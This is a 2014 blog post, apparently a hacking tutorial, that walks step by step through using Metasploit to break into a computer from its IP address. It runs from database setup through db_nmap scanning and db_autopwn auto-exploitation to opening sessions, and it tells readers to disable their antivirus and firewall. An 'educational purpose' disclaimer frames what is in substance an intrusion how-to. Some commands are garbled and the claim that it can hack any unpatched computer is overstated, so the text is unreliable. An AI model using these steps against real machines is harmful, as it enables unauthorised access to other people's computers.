
Wednesday, June 4, 2014

Hack to Computer With an IP address

In this post i will show you how to hack computer with IP address. This is just for awareness that how easy it is for Hackers to access your computers with just IP address. 
I am using the Tool metasploit also known as magical tool, It has the power to hack any un-patched computer with only IP address. metasploit is just like RAT, once it get access to someone’s computer it can see screen, controls, mouse, keystrokes and every thing they do on computer. 

Hack to Computer With an IP address

For Metasploit to run properly, you must switch off anti-virus solutions and your local firewall. Lets start just follow these simple steps. 

Step 1:

  • Download metaSploit from Here and install it. 


Step 2:

  • Now for Database you need PostgrSQL. Download it from Here
  • Use all the Defaults so that it works properly

Step 3:

  • After you have installed both tools.
  • Open PostgrSQL folder where installed and open pgadmin III
  • Right click on Server and connect ( in left Box ). keep this window open.



Step 4: 

  • From this Steps Hacking Starts. 
  • Go to Start >> all programs >>  Metasploit >> metasploit console


Step 5: 

  • In the windows type >> db_connect postgres: password@localhost : 5432
  • A lot of text flash-buy will be seen in first time but it’s normal don’t worry. 


Step 6: 

  • Type >> db_status Just to make sure you are connected correctly.

Step 7: 

  • Now Type >> db_nmap
  • Replace with IP of the Computer you are trying to hack.

Step 8: 

  • This step is about automatic exploitation
  • Type >> db_autopwn -t -p -e -s -b
  • This will start auto-exploitation & will take few minutes. 

Step 9: 

  • After the exploitation is completed. 
  • Type >> sessions -1  to see what scanner has found. 
  • If all goes write you will see a list of exploits. 


Step 10: 

  • By using these exploits hackers can HACK computer easily. 
  • Exploits are in numerical values with obvious names. 
  • Type >> sessions-i ExploitNumber  In order to use these exploits.
This is for educational purpose.

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